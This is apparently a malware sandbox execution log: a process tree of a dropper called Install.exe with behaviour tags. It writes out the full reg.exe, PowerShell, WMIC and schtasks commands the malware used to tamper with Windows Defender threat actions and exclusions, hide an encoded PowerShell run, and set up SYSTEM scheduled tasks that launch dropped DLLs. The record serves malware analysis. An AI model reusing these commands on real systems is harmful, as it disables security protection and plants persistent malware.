- Scheduled Task/Job: Scheduled Task
PID:4268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 7964⤵
- Program crash
PID:2292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS66D8.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS66D8.tmp\Install.exe pa /aididiw 385137 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:708
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1840
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:323⤵PID:3140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:324⤵PID:2812
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:643⤵PID:4624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:323⤵PID:308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:643⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:323⤵PID:4180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:643⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:323⤵PID:3464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:643⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:323⤵PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:643⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:323⤵PID:4104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:643⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:323⤵PID:372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:643⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:323⤵PID:4656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:643⤵PID:2104
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBruxernq" /SC once /ST 09:41:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBruxernq"2⤵PID:2516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBruxernq"2⤵PID:648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QVuDljbAZykxnpoWI" /SC once /ST 01:10:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\dsxSnPX.exe\" Cc /rWfZdidmv 385137 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QVuDljbAZykxnpoWI"2⤵PID:1468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 7122⤵
- Program crash
PID:4372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4176
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1852
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4116
-
C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\dsxSnPX.exeC:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\dsxSnPX.exe Cc /rWfZdidmv 385137 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1664 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bBfKaGDnIKdTdJZScE"2⤵PID:3340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4292
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:392
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RNplELueU\DkhdUC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wgFtIVrBuHdIdLf" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wgFtIVrBuHdIdLf2" /F /xml "C:\Program Files (x86)\RNplELueU\KlbOVPZ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "wgFtIVrBuHdIdLf"2⤵PID:212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wgFtIVrBuHdIdLf"2⤵PID:1356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tIlFGqArMHXptH" /F /xml "C:\Program Files (x86)\nWWVEJXizSHU2\NxjhajZ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IkBmJZAegNpZy2" /F /xml "C:\ProgramData\evUSZSaqPkAEukVB\FioEBmB.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PAxmAUNtgsWrISWfx2" /F /xml "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\VUUwJpN.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OurksSTJxLQIbfTMDbR2" /F /xml "C:\Program Files (x86)\fLdzueVMGzfAC\OiIAKSw.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vczjtXgpVbXDKOBgh" /SC once /ST 15:35:46 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\XwIFwyvoUqntekhn\ITILWLsf\MqbbdEy.dll\",#1 /UdidX 385137" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:64
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vczjtXgpVbXDKOBgh"2⤵PID:1280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QVuDljbAZykxnpoWI"2⤵PID:1924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 21202⤵
- Program crash
PID:3676
-
-
